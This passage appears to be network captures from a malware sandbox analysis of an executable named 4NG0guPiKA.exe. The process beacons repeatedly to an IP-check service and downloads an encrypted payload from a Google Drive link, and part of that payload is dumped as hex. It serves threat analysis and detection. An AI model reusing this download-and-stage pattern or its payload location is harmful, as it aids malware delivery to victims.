    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:49.825568914 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:49 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.10 | 49769 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:50.712588072 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:51.544471025 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:51 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.10 | 49771 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:52.414118052 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:53.242187977 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:53 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.10 | 49773 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:54.373991966 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:55.204922915 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:55 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.10 | 49775 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:56.003343105 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 03:06:56.822174072 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:56 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.10 | 49777 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:57.727060080 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 03:06:58.555742025 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:58 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.10 | 49779 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:59.554446936 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 03:07:00.358151913 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:07:00 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.10 | 49781 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:07:01.469693899 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 03:07:02.299186945 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:07:02 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
37 | 192.168.2.10 | 49783 | 132.226.8.169 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:07:05.869218111 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 03:07:06.698160887 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:07:06 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49708 | 142.250.181.238 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:05:22 UTC | 216 | OUT | GET /uc?export=download&id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
2025-01-11 02:05:23 UTC | 1920 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 11 Jan 2025 02:05:23 GMT
Location: https://drive.usercontent.google.com/download?id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-_0gKzAoKXAfhtMxwpj2GHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49709 | 142.250.186.33 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:05:23 UTC | 258 | OUT | GET /download?id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2025-01-11 02:05:26 UTC | 4933 | IN | HTTP/1.1 200 OK
X-GUploader-UploadID: AFIdbgTL66myTrSqkgkQ8pdmcnFSHAF-PDMvhZiQnxFiZgeSztGcTPy6ZGgMh3Wu-8xbkYx9
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="GpennlcqClLC4.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 94272
Last-Modified: Wed, 04 Dec 2024 05:24:29 GMT
Date: Sat, 11 Jan 2025 02:05:26 GMT
Expires: Sat, 11 Jan 2025 02:05:26 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=NRB2Aw==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2025-01-11 02:05:26 UTC | 4933 | IN | Data Raw: a7 e5 b5 dd f1 13 86 5b bc c0 e5 d1 62 b4 20 9d 5c ba 0d 6c 1e 19 9b cc bb 43 42 d1 d8 d7 1d 96 7a 19 dd 57 e5 f2 72 c3 58 c1 c7 9d d0 16 b6 a5 1e 69 f1 12 f2 1f f3 0c 19 a0 ab ca d0 13 ff c5 67 3e 59 93 a5 8f 3f e6 f0 13 79 49 be 47 92 24 cb 00 4f b1 8b 4e ba c3 f0 1e e3 85 bf f8 15 df 38 57 17 b4 d2 08 4e a3 ed 36 13 6d 35 19 bc e9 c7 06 c1 59 c7 78 bc d5 88 7f 3f 47 fc 17 af b0 ab 0c 87 f0 40 7d 57 b2 1b 58 56 95 23 fe 22 34 4d b4 3f 81 13 a9 69 27 c9 43 2f a7 b3 65 2c fb 52 7e 4a 3e f8 b0 d0 2b e1 97 89 cd d4 88 c1 39 7f de b1 6a a0 cc 05 7a 57 34 d7 62 c5 01 0a 6f 06 5e 45 1b bb 40 a5 bd 98 d1 ef f4 4b df 93 25 7b dd d6 e0 9b 20 17 ac 68 d6 31 93 57 ee a4 20 da 8e d0 96 74 92 46 40 9d 5f 27 b3 b6 1d f3 f4 04 a1 1d ff 3a 3d 26 96 4a 26 4b 88 e8 94 90
Data Ascii: [b \lCBzWrXig>Y?yIG$ON8WN6m5Yx?G@}WXV#"4M?i'C/e,R~J>+9jzW4bo^E@K%{ h1W tF@_':=&J&K
2025-01-11 02:05:26 UTC | 4832 | IN | Data Raw: 5d 53 a1 d7 b2 18 4c 2e 91 c1 1b 2c ad 72 cf 83 21 38 35 d9 85 e6 bb fd ee 6a 56 95 0c 0f e4 89 d6 da 87 d5 0e c5 6c ba 68 9a a7 9a 5a 1b 3c c0 d4 54 25 5a 5e cb 1d 89 c1 53 f7 d1 00 b1 f8 61 5e c8 02 68 96 68 6c e4 56 08 64 e6 59 cf 54 00 fc 95 f0 eb ba c5 17 99 40 88 ba 91 04 9a 52 f8 90 ed 56 e1 19 3d a5 09 b6 1e 02 cf 6c ed a5 6b 7f 51 cd e2 09 72 9d 59 b8 b7 7c 17 9d 59 69 60 c5 53 d1 cf 40 b9 c1 c1 a4 ea 5b a7 6c 61 55 f9 51 94 a3 ed c0 e4 b9 ec a7 8c 93 b3 0b 00 86 4f 40 28 48 44 78 1b 3d f1 d5 e6 cc 66 b1 b3 c6 01 dd 5c 1c 5f 79 0b f8 de 0d df 8b c9 5c e7 75 96 85 f7 36 bb 31 73 38 69 21 7b 19 0e 78 9d e7 93 93 b6 7f 48 1b 24 b3 b5 02 89 be 48 3d 22 4f 86 74 37 45 9a 01 0a c5 b8 5f 3f 32 51 7c f7 55 a0 ee bf 6a d2 2d 1a 48 72 4c 17 c3 d5 40 93 bc
Data Ascii: ]SL.,r!85jVlhZ<T%Z^Sa^hhlVdYT@RV=lkQrY|Yi`S@[laUQO@(HDx=f\_y\u61s8i!{xH$H="Ot7E_?2Q|Uj-HrL@
2025-01-11 02:05:26 UTC | 1323 | IN | Data Raw: 0d 87 08 aa a0 75 57 a4 9d 5e 05 ff 71 b0 5d fd 2e 10 74 dd a8 67 69 3a fb fa 66 34 11 07 50 40 42 5c 23 b1 f9 ad cd 6f de 47 02 2c 93 5b 0c 37 6f 80 48 64 35 69 73 e2 9b 15 74 61 b0 5b 38 a7 dc 59 5b 6b af 98 93 38 34 db d6 0f 0c 95 bd cd c1 b8 75 a4 e7 70 7d 42 75 ca eb 53 cf 62 ee 93 2b 11 d1 f4 c1 0c e9 17 ee 00 dc f6 ec da 8c 48 83 2c 61 4f 0a e1 4c 11 5c 63 19 e2 b0 d2 ff 6d 0d 51 10 90 8b 0f a4 cb f8 42 f2 45 0e 9e 7e 15 59 da 07 62 48 84 3d 2c 72 50 78 18 91 fd f8 16 90 10 22 58 53 eb 62 89 05 9e b1 19 78 d8 42 2d 10 04 97 47 e3 84 06 80 c3 b3 de ec dd a2 9f 9b 8d 19 06 e4 d2 7a 77 63 24 b4 45 80 8f f0 0e 61 db f1 92 18 63 5c 66 70 77 dc ef c2 6a 9f eb 7f f9 52 8a b6 40 5b 81 88 f1 4f 95 bb e5 60 11 3a 68 79 c7 75 d6 69 b4 12 90 42 12 5a 69 8b 80
Data Ascii: uW^q].tgi:f4P@B\#oG,[7oHd5ista[8Y[k84up}BuSb+H,aOL\cmQBE~YbH=,rPx"XSbxB-Gzwc$Eac\fpwjR@[O`:hyuiBZi
2025-01-11 02:05:26 UTC | 1390 | IN | Data Raw: af 2d fc bc d2 94 e4 41 5d f2 d0 da 53 82 b1 3f c1 1f 9d 3f 4f c2 3a 90 79 09 fe a4 97 ce 55 1a b1 29 34 13 9b 53 ff a1 1f 67 ba 4d b5 71 02 ec 8e 08 bd 5c 9e 90 1d 0f 89 e3 3e a7 fb 71 16 6f 6e 26 6b 5d be b5 ed 6b db 44 e1 48 0e 81 68 c0 90 92 df 8d e0 ae 1a 16 d4 b3 2f b0 fb 97 d2 3c 07 25 65 1d 11 9d 13 f4 b4 85 36 98 90 01 dc 75 1f 47 8f 68 e2 66 0c 9d 0d a4 02 6e cb 29 a3 ab aa db 6b 27 bd 49 71 46 ed b4 a1 fb 2e 6f 7d d2 c8 d6 77 18 b9 3c ce 6e 2e 95 7b c5 9e 85 74 ec f2 10 6a f0 c6 46 e3 4a 30 76 f5 b9 db 90 e7 65 d0 7c 76 19 76 bb 0d 21 05 7a f8 44 a4 fd 8f 68 64 21 bf 23 40 c6 e8 83 fa 18 14 08 6f 1b 1d 16 fb da 34 d3 33 3d cd 6b 60 84 27 0a 3d 9a fe b0 5a 65 91 77 f7 52 7f 46 40 88 6a a8 8f 35 fa 44 0a 35 3a c2 e7 d7 4d ed 04 98 f5 ae 7f be bd
Data Ascii: -A]S??O:yU)4SgMq\>qon&k]kDHh/<%e6uGhfn)k'IqF.o}w<n.{tjFJ0ve|vv!zDhd!#@o43=k`'=ZewRF@j5D5:M
2025-01-11 02:05:26 UTC | 1390 | IN | Data Raw: cd 79 5d 58 34 cb e0 b3 9d 37 4f e8 84 e0 a3 2b 7e d9 ef f7 e3 0a a7 9a be ea b9 12 f0 fc 3a 9b f3 cf 5f c6 ba 10 fb 71 a2 5f f4 c9 0b cc 7a 8d 11 6c 11 d2 d5 ca ed 3c aa 5b 42 09 ff 21 bc 17 26 a1 9e f5 87 c2 b5 79 59 cb b1 83 75 17 03 a8 15 50 42 cf 02 1a e3 af 8f f1 80 70 73 4f 05 2f ae c7 c9 10 e5 85 b7 c4 28 99 ff 78 ed 17 5b 5c b2 bb 11 81 d1 b1 d5 2c 1f fe b9 f6 03 da 6d 48 4e 03 fa cd 4a ab 6f 15 a4 18 cd 0c 61 8a 79 b9 21 b2 ee 01 73 27 66 8c 54 f1 96 f3 d0 ea 8c 56 1c ae 2f 11 b9 1e 25 3f 65 07 9a 83 2e 25 49 68 dd 27 5d 04 e8 f2 dd 40 df a4 17 c4 84 6d a4 2e f9 34 77 9c 46 cb 2b 94 ba 19 1f 1b f0 8e 0b 90 5a 3e fa 4e 52 6f b6 c2 6c cd ae f9 62 3b 7a db 8c 8e 4a 3f e6 fe 3b 37 49 41 b2 81 32 01 e2 4a b1 fb 5d 9a d2 a6 6c 61 9f bf 88 7a 2c 38 57
Data Ascii: y]X47O+~:_q_zl<[B!&yYuPBpsO/(x[\,mHNJoay!s'fTV/%?e.%Ih']@m.4wF+Z>NRolb;zJ?;7IA2J]laz,8W
2025-01-11 02:05:26 UTC | 1390 | IN | Data Raw: ae 03 68 5c 70 2d 0c 91 2f 67 45 78 c9 23 77 19 30 04 33 56 e9 97 5d 63 d7 03 a1 5d 82 a0 2a 68 65 15 f9 08 6c dd 3e 18 51 fb 4b 3b f8 b0 9e d1 55 67 37 20 c3 0a 55 3c 34 00 52 2d 98 55 b6 6a 31 58 75 80 46 33 45 aa ca f0 e7 ed d0 1a 77 10 3d 28 2f 81 44 c2 57 00 5a f4 5b 48 a7 b8 49 77 c5 24 82 c3 3d 66 b4 6c a8 73 48 57 b5 f1 bf ec bb fe 92 15 47 9c 72 92 9a 9b d7 c9 89 ec 8f aa 91 b0 68 4e b8 91 42 3c 28 c5 aa 59 09 43 45 c1 ae a9 d2 76 d5 f5 6f 4e f2 72 50 a7 2a 3b 96 62 4e 53 41 0a 6e ea 59 cf 54 6f ec fa 70 ef c8 99 0f 94 21 93 bf a0 da 8d 49 e6 1b fd 45 e4 09 14 91 03 bf 6b 13 cf 1f 60 ca 6a 75 42 c1 f3 d3 04 0d 30 a3 69 18 40 8a 8f ee 56 4b 53 d0 d6 47 a0 dc bf 2c fc 53 23 7b 5b 8f d1 33 fb 33 e7 c0 ee a8 fa b5 b2 2a 54 0b 0a fe 2c 4f f6 18 49 66
Data Ascii: h\p-/gEx#w03V]c]*hel>QK;Ug7 U<4R-Uj1XuF3Ew=(/DWZ[HIw$=flsHWGrhNB<(YCEvoNrP*;bNSAnYTop!IEk`juB0i@VKSG,S#{[33*T,OIf
2025-01-11 02:05:26 UTC | 1390 | IN | Data Raw: ff cd bd bd 0b f7 d4 70 77 7b 21 d5 f7 71 1d 64 fd 9d 48 35 e0 f9 b3 5f e1 17 ee 0e fe 25 ea f2 7e 48 83 26 68 33 79 a7 4d 15 22 36 6a 35 ba fa ad 61 05 29 41 8b 98 7a da 1c d4 4f f6 18 4c f1 ad 11 71 0f 10 b8 51 82 2b 3f 77 13 27 19 91 f9 8e 54 97 62 40 6c 07 9b 0d 56 09 96 a4 12 61 cf 69 52 6c 63 df 37 8c 55 2e 53 c5 a0 d0 e4 cc a5 ef 7c dd 19 76 8f 79 29 77 65 3d 99 00 85 a7 69 03 68 ce e5 8b 0e 47 7d 27 0d 13 df ee c6 48 23 ef 7e f3 58 e5 b3 6b 5b 8b bb 55 45 95 97 f7 69 00 16 7c 87 d7 66 de 06 83 04 6e 47 7f 6f 78 80 a8 94 0f f7 2b a3 cd d7 2a 2b 61 a3 37 0a d8 e7 82 25 cf 6b 85 ae b2 9c 1f 6b 24 5c b1 14 71 21 2c 0d 88 ca c4 8e 6e ad ac 44 48 c7 ff 4a 27 bb 6b 62 74 f1 b8 5b 83 e3 30 12 95 c8 3d 1e 0f 6c 42 b9 60 6d 51 fc 97 1c 6a d8 a4 46 6d 6f b5
Data Ascii: pw{!qdH5_%~H&h3yM"6j5a)AzOLqQ+?w'Tb@lVaiRlc7U.S|vy)we=ihG}'H#~Xk[UEi|fnGox+*+a7%kk$\q!,nDHJ'kbt[0=lB`mQjFmo
2025-01-11 02:05:26 UTC | 1390 | IN | Data Raw: f5 72 62 62 21 e2 5d 8a 98 6f b6 78 9a 1b 98 51 35 78 ed c1 51 e3 30 ba c7 ec cb c3 95 ee 04 7b 64 9c 0b 61 ab 91 ba 13 84 f8 72 b9 92 5a 44 72 03 67 19 56 cc 89 e9 4a 47 14 02 c7 2f 03 40 b0 da 34 df 52 d5 db 6b 10 c0 d8 0a 15 3a 5c 95 48 13 5e 70 85 c4 11 a2 27 e7 cf c7 50 33 95 11 a8 10 29 94 85 d7 4d e1 65 0a ed bf 0b a3 80 e3 21 f1 c6 7f d3 56 5b aa 8c 87 62 19 2b 41 a1 ff 09 69 5f 7b d7 ac 72 c4 88 b5 89 de 02 ab 9f 9f 55 b3 c2 79 1a ba e5 7e cb c8 00 58 69 6f de 57 84 00 b0 90 8d c3 0d d5 05 70 1f 27 3c 32 32 c3 a4 ce 50 03 66 9a 6d 2b 08 f4 46 98 c2 5b ad c2 f8 36 17 dd cb 2f 88 4c 05 43 e2 aa 5f 47 2e 66 b2 a2 30 59 84 b3 4b 93 cd bd 72 b9 b9 70 74 11 69 15 15 d6 dd a8 c7 f3 f2 d6 f9 ba 34 2d d9 58 1a 87 fa 04 c4 26 b9 ce 2e 0f 84 3e 34 88 31 ee
                                                                                                          Data Ascii: rbb!]oxQ5xQ0{darZDrgVJG/@4Rk:\H^p'P3)Me!V[b+Ai_{rUy~XioWp'<22Pfm+F[6/LC_G.f0YKrpti4-X&.>41
